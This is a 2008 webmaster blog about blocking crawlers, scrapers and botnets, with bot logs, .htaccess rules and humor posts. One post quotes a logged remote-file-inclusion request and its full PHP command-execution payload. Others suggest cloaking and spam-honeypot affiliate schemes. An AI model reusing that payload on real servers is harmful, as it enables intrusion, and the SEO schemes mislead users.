Sunday, March 09, 2008

You Know You Drink Too Much When...

When you wake up face down in a pizza you know you got mad drinking skills, especially when you went face down in mid-bite of the pizza.

When you wake up and your pillow is covered in pizza vomit, that's madder skills cause you didn't die in your sleep aspirating on pizza vomit. Having to shave your beard off because you can't seem to wash out all the partially digested bits of pizza is a bit embarrassing. However, having the side of your face that laid on the pizza sauce all night get stained and looking bright red all day is priceless.

When you wake up under your bed, realize you're on cold hard wood, bump your head on wood when you try to get up and suddenly panic thinking you're in a coffin because it's all wood and you can't get up, you've truly arrived.

When leaving a party and the elevator makes your stomach flip-flop you panic as the doors open and vomit down the crack between the elevator and the wall and spew into the elevator shaft just because there's nowhere else to suddenly yak, you're working your way to be an AA superstar!

When you're leaving a party and have no other place than to barf in a water fountain in the lobby of an apartment complex and as you're leaving giggle as you hear people walk up to take a drink screaming, you're in the club!

When you barf up brightly colored red nacho chips and suddenly panic thinking your stomach is bleeding profusely until you remember what you ate .... and then drink too much and barf a couple of nights later just to make sure that's what it really was.

When you and your friends are out partying all night and you suddenly fill up the floor of the car with vomit and 6 of your friends bail out the window just to get away from you

You know your friends are all alkies too when the topic of conversation is always which one of you wussies is going to drop a street pizza or a technicolor yawn first

Another clue your friends have drinking problems is when they fall out of the car when they open the door

A clue something bad happened is when you wake up on a sofa in a house you don't remember, find your glasses in your pocket and when you put them on can't see thru the thick film of dry vomit that's encrusted them

FINALLY, last but not least, you know it's time to stop drinking when you wake up and flies are picking the vomit out of your nose.

What Time Is It Anyway?

Got up this morning and all the computers and TV's said it was 9:00am but the phones and alarm clocks said it was 8:00am.

Obviously this was the daylight savings bullshit gone bad but how in the hell could someone fuck up the atomic time clock which the alarms and phones feed from?

Had this been an actual day when I really needed to get up and be somewhere by 8am I would've been fucked since both the alarm clock and the alarm in the phone, which I prefer because it's louder, would've both malfunctioned.

Anyway, around 11:00am everything was back in synch.

Don't you just love fucking daylight savings time?

Blech.

There Goes the Bad Neighborhood

Isn't it ironic that a day after I wrote about stopping snooping SEO tools, here comes one of them trying to crawl one of my websites?

The user agent and IP address are:

208.77.208.198 [emeraldarborvitae.viviotech.net.]
"Bad-Neighborhood Link Analyzer (http://www.bad-neighborhood.com/)"
They were automatically blocked on my site because I white list only allowed user agents and they use an unauthorized user agent name, but they could always switch to mimic a browser so in the long run it's best to block the IP range.

Turns out Viviotech is the host of Bad Neighborhood's site:
OrgName: Vivio Technologies
NetRange: 208.77.208.0 - 208.77.211.255
CIDR: 208.77.208.0/22
After you block this data center range the tools from Bad Neighborhood can't be used to scan your site, check your Apache server headers, or any other thing.
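
If the blocking happens in a script rather than in the server config, the range check is only a few lines. A minimal Python sketch, assuming the /22 from the whois record above is the only range of interest; the name is_blocked is made up for illustration:

```python
import ipaddress

# Range taken from the whois record quoted above.
BLOCKED_NETWORKS = [ipaddress.ip_network("208.77.208.0/22")]


def is_blocked(ip: str) -> bool:
    """Return True when ip falls inside any blocked network."""
    address = ipaddress.ip_address(ip)
    return any(address in network for network in BLOCKED_NETWORKS)


if __name__ == "__main__":
    # The crawler's address from the log entry above.
    print(is_blocked("208.77.208.198"))
    # First address past the end of the /22.
    print(is_blocked("208.77.212.0"))
```

Checking against the network object instead of comparing string prefixes avoids mistakes at the edges of the range, since a /22 spans four different third octets.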

Sorry, but you're not allowed back into my neighborhood.

Buh bye.

Saturday, March 08, 2008

Jayde NicheBot Crawls for iEntry's Web of Sites

Who out there remembers the Jayde directory?

Some of us submitted our sites to Jayde way back in '96 or '97, who knows exactly, and now our sites are being hit by something called the "Jayde NicheBot".

"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) Jayde NicheBot"
I was curious why some site I submitted to about 10 years ago was pinging my server all these years later so I did a little research to see what they'd been up to in the interim and they appear to have been very prolific, almost to domain park proportions.

Jayde is currently owned by iEntry.com and if you have McAfee SiteAdvisor enabled in your browser it goes RED meaning that iEntry has something negative on file with SiteAdvisor that says the following:
Feedback from credible users suggests that this site sends either high volume or 'spammy' e-mails.
Took a look and found someone that posted one of those 'spammy emails' with a ton of iEntry's domain names listed.

On iEntry's website they claim:
iEntry properties include more than 370 Web sites and over 100 e-mail newsletters that are viewed by more than 5 million users every month.
Did a quick search for their 370 sites and Yahoo finds over 170 of them.

It appears iEntry owns ExactSeek.com, sitepronews.com, webpronews.com, metawebsearch.com, seo-news.com (and forum), and a ton of directories, bunch of sites here, shitload of sites there, and last but not least here it's tied together with ISEDN.ORG

Google and Yahoo could find listings about my sites in a bunch of their directories which begs the question:

Why do Google and Yahoo index all those redundant directories?

I found references to my sites in about 40 of them, there's a shock, knock me over with a feather. About 40 sites was all Google and Yahoo would easily report, and the answer to the "why are they indexed?" question appears to be that the order of the listings in the directory is changed for the same content on a different site so it seems to be unique per directory as far as the search engines are concerned. Maybe there were other changes as well, I didn't look too deep.

However, I did check Live search which doesn't appear to be so gullible as it only reported the duplicate content in 5 sites.

Hey, submit your link, it's FREE and you can advertise too!

Hope I didn't blow out anyone's sarcasm meter with that last quip.

Friday, March 07, 2008

Slow Down Nosy SEO's and Snooping Competitors

Most webmasters spend a lot of time and effort working on marketing their website, or pay someone a lot of money to do this, yet don't do a few common sense things that keep lazy and nosy assed SEO's or other competitors from quickly analyzing all your hard work and simply stealing what you've done.

Not that you can completely stop them because much of the competitive information about who links to you is already public, collected by search engines and toolbars, but you can sure as hell make it a little more difficult to get the rest of the data they want.

Since the SEO Chicks published a list of competitive research tools to help those nosy SEO's snoop, I just thought it would be fair and useful to have a nice list of ways to stop as many of those snooper tools as possible.

Block Archive.org - No need to let anyone see how your site evolved, snoop or even scrape through archive pages without your knowledge so block their crawler.

User-agent: ia_archiver
Disallow: /
Rumor has it that the ia_archiver may crawl your site anyway so adding it to your .htaccess file is a good precaution as well.
RewriteCond %{HTTP_USER_AGENT} ^ia_archive
RewriteRule ^.* - [F,L]
Block Search Engine Cache - Some people cloak pages and just show the search engines raw text yet show the visitors a complete page layout. Who cares, that's your business and a competitive edge you don't need to share, plus pages can be scraped from search engine cache as well, so disable cache on all pages.

Insert the following meta tag in the top of all your web pages:
<meta content='NOARCHIVE' name='ROBOTS'>
Block Xenu Link Sleuth - Why do you need people sleuthing your site? Screw 'em...

Add Xenu to your .htaccess file as well:
RewriteCond %{HTTP_USER_AGENT} ^ia_archive [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu
RewriteRule ^.* - [F,L]
Make Your Domain Registration Private - Why give the SEO's or any other competitor any clues to help them whatsoever?

Sign up with DomainsByProxy and this will make the nosy little bastards happy:
WHATEVERMYDOMAINNAME.COM
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
Restrict Access To Unauthorized Tools - Use .htaccess to white list access to your site and just allow the major search engines and the most popular browsers which will block many other SEO tools. If you don't understand the white list method and it scares you, there's a few good black lists around too.

This is a limited sample for informational purposes only just to give an idea how it works, see the thread linked above for more in depth samples by WebSavvy, just be cautious in implementing a white list as it's very restrictive:
#allow just search engines we like, we're OPT-IN only

#a catch-all for Google
BrowserMatchNoCase Google good_pass

#a couple for Yahoo
BrowserMatchNoCase Slurp good_pass
BrowserMatchNoCase Yahoo-MMCrawler good_pass

#looks like all MSN starts with MSN or Sand
BrowserMatchNoCase ^msnbot good_pass
BrowserMatchNoCase SandCrawler good_pass

#don't forget ASK/Teoma
BrowserMatchNoCase Teoma good_pass
BrowserMatchNoCase Jeeves good_pass

#allow Firefox, MSIE, Opera etc., will punt Lynx, cell phones and PDAs, don't care
BrowserMatchNoCase ^Mozilla good_pass
BrowserMatchNoCase ^Opera good_pass

#Let just the good guys in, punt everyone else to the curb
#which includes blank user agents as well


order deny,allow
deny from all
allow from env=good_pass

Disclaimer: I don't use .htaccess for much so please don't ask for a complete file, this is just a sample as I use a more complex real-time PHP script to control access to my site.
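
For anyone who finds the logic easier to follow outside of Apache, here is a rough Python sketch of the same opt-in idea. It reuses the patterns from the sample above and is for illustration only; it is not the real-time PHP script mentioned in the disclaimer, and the function name good_pass is simply borrowed from the environment variable in the sample.

```python
import re

# Same patterns as the BrowserMatchNoCase lines in the sample .htaccess.
ALLOWED_PATTERNS = [
    r"Google",
    r"Slurp",
    r"Yahoo-MMCrawler",
    r"^msnbot",
    r"SandCrawler",
    r"Teoma",
    r"Jeeves",
    r"^Mozilla",
    r"^Opera",
]
ALLOWED = [re.compile(p, re.IGNORECASE) for p in ALLOWED_PATTERNS]


def good_pass(user_agent: str) -> bool:
    """Opt-in check: True only if the user agent matches a white list pattern.

    Blank user agents match nothing, so they are punted as well.
    """
    return any(pattern.search(user_agent) for pattern in ALLOWED)


if __name__ == "__main__":
    for agent in ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)",
                  "libwww-perl/5.48",
                  ""):
        print(repr(agent), good_pass(agent))
```

Keep in mind that anything starting with "Mozilla" gets through, so a white list like this only stops tools that announce themselves honestly. The rest need the extra layers described below.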

Block Bots and Speeding Crawlers - You can use something like the nifty PHP bot speed trap Alex Kemp has written or Robert Plank's AntiCrawl. Just another layer of security piled on against snoops and scrapers that pretend to be MSIE or Firefox to avoid the white list or black list blocking in .htaccess.
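
The general idea behind a speed trap can be sketched in a few lines of Python. This is not how either of the tools named above is implemented; it's a generic sliding-window counter, and the limits shown are hypothetical numbers you would tune against your own traffic.

```python
from collections import defaultdict, deque

MAX_REQUESTS = 10     # hypothetical limit, tune for your own traffic
WINDOW_SECONDS = 5.0  # hypothetical window


class SpeedTrap:
    """Flag clients that request more than max_requests pages per window."""

    def __init__(self, max_requests=MAX_REQUESTS, window=WINDOW_SECONDS):
        self.max_requests = max_requests
        self.window = window
        self.hits = defaultdict(deque)  # ip -> timestamps of recent requests

    def is_speeding(self, ip: str, now: float) -> bool:
        recent = self.hits[ip]
        recent.append(now)
        # Drop timestamps that have fallen out of the window.
        while recent and now - recent[0] > self.window:
            recent.popleft()
        return len(recent) > self.max_requests


if __name__ == "__main__":
    trap = SpeedTrap(max_requests=3, window=1.0)
    for t in (0.0, 0.1, 0.2, 0.3):
        print(t, trap.is_speeding("192.0.2.1", t))
```

Passing the timestamp in as an argument keeps the class easy to test; in a live script you would feed it time.time() on each page request.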

Block Snoops From Robots.txt - Don't allow anyone other than your white listed bots to see your robots.txt file because it has other stuff in it that SEO snoops might find interesting, and it can become a security risk. Use a dynamic robots.txt file like this perl script on WebmasterWorld and just add the rest of your allowed bots to the code next to Slurp, Googlebot, etc.
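
A dynamic robots.txt boils down to picking which file body to send based on who is asking. Here's a minimal Python sketch of that decision, not a port of the perl script mentioned above; the bot list and both rule sets are hypothetical placeholders.

```python
import re

# Hypothetical white list; add the rest of your allowed bots here.
ALLOWED_BOTS = re.compile(r"Slurp|Googlebot|msnbot|Teoma", re.IGNORECASE)

# Hypothetical rules served to trusted crawlers.
REAL_RULES = "User-agent: *\nDisallow: /cgi-bin/\n"

# Everyone else is told to stay out and learns nothing about the site.
DENY_ALL = "User-agent: *\nDisallow: /\n"


def robots_txt_for(user_agent: str) -> str:
    """Return the robots.txt body to serve for this user agent."""
    if ALLOWED_BOTS.search(user_agent or ""):
        return REAL_RULES
    return DENY_ALL


if __name__ == "__main__":
    print(robots_txt_for("Mozilla/5.0 (compatible; Yahoo! Slurp)"))
    print(robots_txt_for("libwww-perl/5.48"))
```

User agents are trivially faked, so this only hides the real file from casual snoops unless the bot's IP is validated too.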

Block DomainTools - since SEO's use it to snoop, no reason to let DomainTools have access so just block 'em.

Probably lots of other things you should be blocking as well but this will give you a good start.

This list doesn't completely stop snoops from manually looking at your site, but it certainly stops all of those automated tools from ripping through all your pages, search engine or archive cache, and presenting a nice pretty report.

Heck, why should you help people take away your own money?

Start slowing them down today and stop the next up and comer from getting the info too easy.

UPDATE:

One more creative thing you can do to your website is cloak the meta tags so that only the search engines see them and disable the meta tags for normal visitors. Nothing really wrong with this because meta tags by definition are only for the search engines and snooping SEO's will be completely left in the dark when they can't see your meta keywords or description.

Combine cloaking meta tags with the NOARCHIVE option described above and they're completely hidden from prying eyes.

Monday, February 18, 2008

Hakia Search Engine Spotted?

Hakia has been advertising their search engine in beta for quite some time and the only thing I've ever seen from them hitting my server is the following sporadic log entries:

06/28/2007 204.14.209.51 "Mozilla/4.0+"
10/05/2007 204.14.209.51 "Mozilla/4.0+"
11/09/2007 204.14.209.51 "Mozilla/4.0+"
12/19/2007 204.14.209.51 "Mozilla/4.0+"
02/18/2008 204.14.209.51 "Mozilla/4.0+"
Whatever it is didn't ask for robots.txt.

Here's their IP range:
HAKIA INC. IP00095 (NET-204-14-209-0-1)
204.14.209.0 - 204.14.209.255
Maybe someone knows more about this but I can't really find any information on them crawling and didn't notice anything on their site about them having a spider.

Thursday, February 14, 2008

MSIE 7 on Livebot IPs

Not sure what this means but I spotted an MSIE 7.0 user agent on the following Livebot IP addresses.

Here's the exact agent used:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)
Here's the IPs involved:
65.55.165.119 [livebot-65-55-165-119.search.live.com.]
65.55.165.38 [livebot-65-55-165-38.search.live.com.]
65.55.165.53 [livebot-65-55-165-53.search.live.com.]
65.55.165.66 [livebot-65-55-165-66.search.live.com.]
65.55.165.96 [livebot-65-55-165-96.search.live.com.]
Could mean anything from Live testing who has rigid user agent checking to making screen shots or they're reusing those IPs for other internal purposes, hard to say.

What's not hard to say is that those IPs with that user agent got automatically blocked on my site for being the wrong thing in the wrong place.

Tuesday, February 12, 2008

Jazztel Scraping Hotzone

Found a hotzone of activity from jazztel.es which has been attempting to scrape like crazy since the first of the year. Obviously they didn't get very far but they keep trying and trying, so I looked at the activity and it's definitely a bot running on 87.218.70.*

Here's the number of attempted pages per IP:

785 - 87.218.70.251
661 - 87.218.70.231
630 - 87.218.70.41
346 - 87.218.70.120
336 - 87.218.70.196
334 - 87.218.70.12
334 - 87.218.70.100
333 - 87.218.70.135
329 - 87.218.70.203
328 - 87.218.70.107
283 - 87.218.70.178
199 - 87.218.70.174
So it's probably a good idea to block 87.218.70.* just to be safe.
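
To see how much of the traffic a single /24 block would cover, the counts above can be rolled up per network. A small Python sketch using only the numbers from the list; the function name is made up for illustration:

```python
import ipaddress
from collections import Counter

# Attempted page counts per IP, copied from the list above.
ATTEMPTS = {
    "87.218.70.251": 785,
    "87.218.70.231": 661,
    "87.218.70.41": 630,
    "87.218.70.120": 346,
    "87.218.70.196": 336,
    "87.218.70.12": 334,
    "87.218.70.100": 334,
    "87.218.70.135": 333,
    "87.218.70.203": 329,
    "87.218.70.107": 328,
    "87.218.70.178": 283,
    "87.218.70.174": 199,
}


def attempts_per_network(attempts, prefix_len=24):
    """Sum the attempted page counts for each enclosing network."""
    totals = Counter()
    for ip, count in attempts.items():
        # strict=False lets us pass a host address and get its network back.
        network = ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)
        totals[str(network)] += count
    return totals


if __name__ == "__main__":
    for network, total in attempts_per_network(ATTEMPTS).items():
        print(network, total)
```

All twelve addresses land in the same 87.218.70.0/24 network, which is why one block rule covers the lot.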

Wednesday, January 30, 2008

Make Money With a Black Hat Honeypot

Instead of trying to fight forum, blog and wiki spam it finally dawned on me that I was taking the wrong approach, don't fight the Black Hat spammers, monetize them!

The basic concept is built around the black hat spammers' love of spamming so the first thing you need to do is set up a bunch of fake forums, blogs and wikis using the popular open source software that the spammers love most. The trick is NOT to install any form of spam controls whatsoever, no captcha, no Akismet, nothing that will slow the spammer down. Let the spammers go wild with your honeypot site and let them make fake profiles, create spam threads and comments, it doesn't matter because we call all this spam "content" for this purpose.

For those advanced webmasters, take a look at some automatic content creation techniques that you can use to prime the honeypot sites with hundreds of bogus threads and blog posts of gibberish. This will trick the spammers into thinking you have a popular site where there will be lots of eyeballs looking at their spam yet nothing could be further from the truth as nobody will ever see their spam. If you want to be truly creative, use the text jumble or synonym switch on each spammer's post to avoid duplicate content and also avoid matching their spam footprint which could be easily detected.

Right about now you must be asking yourself:
"Why in the hell would I build a site designed to be spammed?"

The answer is simple, the spam will become your content and hopefully your honeypot sites will pick up some traffic from the search engines. Best of all, the spammers will keep hitting your site daily so you'll have fresh content and we know how the search engines just love fresh content.

Once you get this traffic from the search engine, simply redirect that traffic to the appropriate affiliate landing page based on the search keyword and VOILA! you start making sales and the free money starts rolling in with the spammers doing all the work.

So there you have a simple yet elegant solution in one neat little bundle to let spammers make you money while you screw them over wasting their time spamming your honeypot sites.

Enjoy.

Very Bad Behavior for Crashed Joomla! Sites

Which is worse, a little spam or being offline for a month?

A major example is shown below: the bot blocker can crash the whole site, and this poor webmaster has been in this state since at least "retrieved on Jan 24, 2008" according to Google cache. However, Live says the same site has been this way since "our crawler examined the site on 1/11/2008", so it's much worse.

Then I found another site down all month as Google cache shows "retrieved on Jan 2, 2008" so they've not only had anti-spam but anti-visitor as well, nothing to worry about.

Warning: botbehavior_bot() [function.botbehavior-bot]: SAFE MODE Restriction in effect. The script whose uid is 3647 is not allowed to access /home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php owned by uid 80 in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Warning: botbehavior_bot(/home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php) [function.botbehavior-bot]: failed to open stream: Unknown error: 0 in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Fatal error: botbehavior_bot() [function.require]: Failed opening required '/home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php' (include_path='.:/usr/local/lib/php-4.4.7/lib/php') in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Looked around the web and there are other Joomla! sites with similar issues as well which weren't completely fatal. I'm not sure why a few sites just crashed with the errors while others proceeded to display errors with page content.

All I can say is that these webmasters need a good site monitoring alarm service at a minimum.
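
Even a crude homegrown check would catch a crash like this. Here's a minimal Python sketch that scans a fetched page body for the kind of PHP error banner shown above. Fetching the page and raising the alarm are left out, and the pattern is an assumption based on the standard "in FILE on line N" wording PHP uses for these messages.

```python
import re

# Matches PHP error banners such as the ones quoted above:
#   "Fatal error: ... in /path/to/file.php on line 22"
PHP_ERROR = re.compile(
    r"(?:Fatal error|Parse error|Warning|Notice):\s*.+? in \S+ on line \d+"
)


def looks_crashed(body: str) -> bool:
    """True when the page body contains what looks like a PHP error banner."""
    return PHP_ERROR.search(body) is not None


if __name__ == "__main__":
    sample = ("Fatal error: botbehavior_bot() [function.require]: Failed "
              "opening required 'bad-behavior-joomla.php' in "
              "/home/xxx/public_html/mambots/system/bb2_bot.php on line 22")
    print(looks_crashed(sample))
    print(looks_crashed("<html><body>Welcome!</body></html>"))
```

Run something like this against the home page every few minutes and a month-long outage turns into an email the same day.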

Saturday, January 26, 2008

Yahoo Slurp Using New IPs

Yesterday my bot blocker notified me of a new range of IPs being used by Slurp that I haven't seen before.

This is a prime example of why I keep telling people who still use IP checking only to update their code and use full trip DNS checking (reverse lookup, then forward lookup) to validate major search engines, so they avoid bouncing spiders with new IPs, but people just don't listen.

Hope the following helps for anyone still validating Slurp by IP only.

The user agent:

"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
A few reverse DNS samples:
67.195.44.83 [lm302008.crawl.yahoo.net.]
67.195.44.80 [lm302005.crawl.yahoo.net.]
67.195.44.84 [lm302009.crawl.yahoo.net.]
67.195.44.103 [lm302028.crawl.yahoo.net.]
67.195.44.100 [lm302025.crawl.yahoo.net.]
67.195.44.96 [lm302021.crawl.yahoo.net.]
67.195.44.99 [lm302024.crawl.yahoo.net.]
67.195.44.92 [lm302017.crawl.yahoo.net.]
The complete list of new IPs Slurp used:
67.195.44.100
67.195.44.101
67.195.44.102
67.195.44.103
67.195.44.109
67.195.44.75
67.195.44.76
67.195.44.77
67.195.44.78
67.195.44.79
67.195.44.80
67.195.44.81
67.195.44.82
67.195.44.83
67.195.44.84
67.195.44.85
67.195.44.86
67.195.44.87
67.195.44.89
67.195.44.90
67.195.44.91
67.195.44.92
67.195.44.93
67.195.44.94
67.195.44.95
67.195.44.96
67.195.44.97
67.195.44.98
67.195.44.99
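
For those still validating by IP list, the full trip DNS check mentioned above can be sketched in Python as follows. The .crawl.yahoo.net suffix comes from the reverse DNS samples in this post; the function names are made up for illustration, and the lookups are passed in as parameters so the logic can be tested without touching the network.

```python
import socket


def reverse_lookup(ip):
    """Return the PTR host name for ip, or None when there is none."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def forward_lookup(host):
    """Return the list of IPv4 addresses host resolves to."""
    try:
        return socket.gethostbyname_ex(host)[2]
    except OSError:
        return []


def is_real_slurp(ip, reverse=reverse_lookup, forward=forward_lookup):
    """Full trip check: IP -> host name -> IP must land back where it started."""
    host = reverse(ip)
    if not host:
        return False
    host = host.rstrip(".").lower()
    # Domain suffix taken from the reverse DNS samples above.
    if not host.endswith(".crawl.yahoo.net"):
        return False
    # Anyone can fake a PTR record, so confirm the name points back at the IP.
    return ip in forward(host)


if __name__ == "__main__":
    print(is_real_slurp("67.195.44.83"))
```

Because the check hangs off the host name instead of a hard-coded address list, a crawler showing up on a brand new range passes without any code changes. DNS lookups are slow, so caching the verdict per IP is a sensible addition.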

Apollo Hosting Shared Server Customers Appear To Be Hacked

One of my websites is a directory and when I last ran my link checker about 10 days ago, to validate that the sites were all still valid, several of them triggered a test that I installed to check for hacked sites. After doing a little bit of research they all turned out to be hosted on Apollo Hosting.

What I found were very large blocks of ads embedded in the home page of each compromised site for every kind of pharma product you've ever seen spammed with their links pointing to landing pages on multiple compromised servers including several universities. Some of the landing pages are also hosted on Apollo Hosting so they are being used to host both the hackers' pharma links and pharma landing pages.

Took a quick look in Google and found a lot of references to individual sites on Apollo being hacked but I don't think they know the extent of the problem.

Please note that these types of hackers don't seem to infect every account on the server, they just infect a chunk of them based on some unknown criteria, so it's hit and miss which domains are infected. Perhaps individual accounts were hacked but I don't think so as I've seen this same type of thing on iPowerWeb (which now appears cleaned up), random sites, some servers had more sites infected, others just a few, who knows why.

Here's a few examples, view the HTML source to see all the embedded pharma ads typically at the bottom of the page:

Caution: disable javascript before you go to any domain

Server: secure1.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.251?pi=4&ob=SLD&oo=ASC
Sample 1: view-source:http://oceancyclery.com/
Sample 2: view-source:http://oldpeking.com/

Server: secure2.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.252
Sample 1: view-source:http://armandmercury.com/
Sample 2: view-source:http://altonaequipment.com/

Server: secure4.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.254
View the source on any domain in the list, not all are infected but it's a heavier server wide infestation...

So on and so forth, you get the idea.

I spot checked a handful of servers, but based on what I've run across in the past with other similar shared server infestations it's probably on all shared servers.

DISCLAIMER: The sites and servers referenced still contained the pharma ads at the time of this writing and may be cleaned up in the future. Follow the links to check the domains hosted to see if the problem still exists in the future.

Sunday, January 20, 2008

Sprint Broadband Saves Bacon Again

Last night I was working quickly trying to stop some asshole that I found attacking my site and was just about finished with the task when suddenly BLAMMO! my SSH session terminated.

My first thought was I had just done something bad and whacked the server.

In a bit of a panic I try to pull up the site in Firefox, nothing, dead.

Is my internet connection down?

Nope, I can get to other web sites and my other servers in different data centers just fine.

Must be Comcast having a routing problem so I quickly confirm that there's a routing issue with a traceroute and breathe a sigh of relief when I can access that server via my other server.

However, this doesn't solve the problem of the asshole that was waging war on my server still abusing the damn thing. The attacker was using a huge proxy list that was more current than mine plus some other things so it wasn't as simple as just blocking a single IP address or anything like that.

So I grabbed the Sprint Broadband USB stick, plugged it in, and a minute later was back on the server via a different network connection and finished blocking the attacker.

A few hours later Comcast was functioning properly again, but thanks to Sprint Broadband I no longer feel like I'm being held hostage when Comcast's service has problems.

Having the Sprint Broadband backup is definitely not a cheap solution but it's saved my ass a few times and now I no longer need to chase Wifi hotspots when I'm on the road. If you can afford the extra $60/month for internet connection redundancy I highly recommend getting a Sprint Broadband card or an equivalent from other providers. I think I'll stick with Sprint until something better and faster comes along in my area!

Friday, January 18, 2008

Botnet Whacks ROBOTS.TXT File

Just when you think having your server hacked is bad enough, these idiots start messing with your robots.txt file.

Here's an example:

83.133.96.246 "GET //errors.php?error=http://www.thefalife.com/robots.txt??? HTTP/1.0" "libwww-perl/5.48"
What did that robots.txt contain?
<?php
echo "549821347819481
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."
";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
Looks like botnets are now OK with messing up your search engine positions as well as messing up your server.

Just imagine that all the pages or images you have blocked are suddenly crawled.

Then imagine that every junk crawler you've denied is suddenly crawling all over your site.

It could take months or years to clean up the damage, if ever.

Fun, huh?
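
Requests like the one logged above are easy to spot because a query parameter carries a full remote URL. Here's a minimal Python sketch of that check; the function name is hypothetical, and sites with legitimate redirect-style parameters would need to exempt them.

```python
from urllib.parse import parse_qsl

REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def looks_like_remote_include(request_target: str) -> bool:
    """True when any query parameter value is itself a remote URL."""
    # Split by hand: a target starting with "//" confuses URL parsers,
    # which read the first path segment as a host name.
    _path, _sep, query = request_target.partition("?")
    return any(
        value.lower().startswith(REMOTE_SCHEMES)
        for _name, value in parse_qsl(query, keep_blank_values=True)
    )


if __name__ == "__main__":
    print(looks_like_remote_include(
        "//errors.php?error=http://www.thefalife.com/robots.txt???"))
    print(looks_like_remote_include("/contact.html"))
```

Rejecting these before any script runs means the remote payload never gets a chance to be included, whatever the botnet chooses to name the file.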

Friday, January 11, 2008

Defective Norton AV Dumped for Avast, PC Runs Better!

Before you start hammering on me about Norton Anti-Virus being crappy bloatware, I already knew that, but it came pre-installed with the machine, never caused a problem other than a little slowness now and then, so just using it was easier than installing something new.

However, a couple of days ago Norton AV puked when I rebooted the machine and all bets were off.

Norton AV claimed that something Norton needed was no longer registered and directed me to some auto-fix located on their website. The auto-fix was a piece of shit, got a couple of web errors trying to use it. Finally, it was downloaded and ran but coughed up an error at the end telling me to run it again. Ran it again and it said it was installed properly and I should reboot. Rebooted the machine and it said the same shit wasn't registered and the same auto-fix said it was fixed.

I hate this fucking shit.

OK, fine, let's just uninstall and re-install Norton, that should fix the problem.

Yup, that error was fixed but I got 2 new ones in its place.

FUCK!

OK, managed to resolve those errors and now Norton seems to be running fine.

Seems to be running fine is the operative phrase here.

Part of the Live Update won't update, keeps spiking the CPU and memory consumption, it's out of control. Tried to fix it to no avail because it seems that the file it downloaded to update just won't install properly so it's fucked and it locks up the machine trying to install it meaning I'm fucked when it's running.

To be quite blunt, I simply got tired of fucking with it at this point.

Simple solution, BYE BYE NORTON!

I use AVG on another machine and it's OK but I thought I'd give Avast a try this time.

Downloaded Avast and installed without a hitch, smooth sailing, no bullshit.

The best part is, Avast loads and runs faster so now my PC boots quicker and runs faster overall.

No more bloated Norton AV ever again and if Avast keeps working this good they'll keep my business.

Thursday, January 10, 2008

Scraping South of the Border

Never really had much of a problem with scrapers from Mexico before but today one came bouncing through Megared's proxy server:

200.52.167.3 [customer-CLN-167-3.megared.net.mx.] requested 11 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.52.167.8 [customer-CLN-167-8.megared.net.mx.] requested 156 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.52.167.4 [customer-CLN-167-4.megared.net.mx.] requested 31 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.52.167.9 [customer-CLN-167-9.megared.net.mx.] requested 36 pages as "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
They were just speeding through real fast asking just for pages, nothing else, the typical scraper.

Not much you can do about proxy servers and IP pools without punishing the innocent except set it to challenge all future accesses but that's a bit extreme for a single instance.

It's not like the crazy shit that comes from airtelbroadband.in, but that's a different blog post.
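
The "pages only, nothing else" pattern described above can be turned into a rough heuristic. This Python sketch assumes you already have the list of paths one client requested; the extension list and the threshold are hypothetical, and a real browser with a warm cache can look the same, so treat a hit as a reason to challenge the client, not proof.

```python
import posixpath

# Hypothetical list of extensions a real browser normally fetches with a page.
ASSET_EXTENSIONS = {".css", ".js", ".gif", ".jpg", ".jpeg", ".png", ".ico"}
MIN_PAGES = 10  # hypothetical threshold before the pattern means anything


def pages_only(paths, min_pages=MIN_PAGES):
    """True when a client fetched plenty of pages but never a single asset."""
    pages = 0
    for path in paths:
        # Ignore any query string before looking at the extension.
        ext = posixpath.splitext(path.split("?", 1)[0])[1].lower()
        if ext in ASSET_EXTENSIONS:
            return False
        pages += 1
    return pages >= min_pages


if __name__ == "__main__":
    scraper = [f"/page{i}.html" for i in range(11)]
    browser = scraper + ["/style.css", "/logo.gif"]
    print(pages_only(scraper), pages_only(browser))
```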

Tuesday, January 08, 2008

Harry Down Under

Something calling itself "Harry" has been hitting one of my sites since June '07 and seems to hit for a couple of days, go away a week or two, come back, repeat and rinse as needed.

Here's what Harry TRIED to do today:

203.6.205.34 - "GET /contact.html" 301 "Harry"
203.6.205.34 - "GET /contact.html" 200 "Harry"
203.6.205.34 - "GET / " 301 "Harry"
203.6.205.34 - "GET / " 200 "Harry"
203.6.205.34 - "GET /robots.txt" 301 "Harry"
203.6.205.34 - "GET /robots.txt" 200 "Harry"
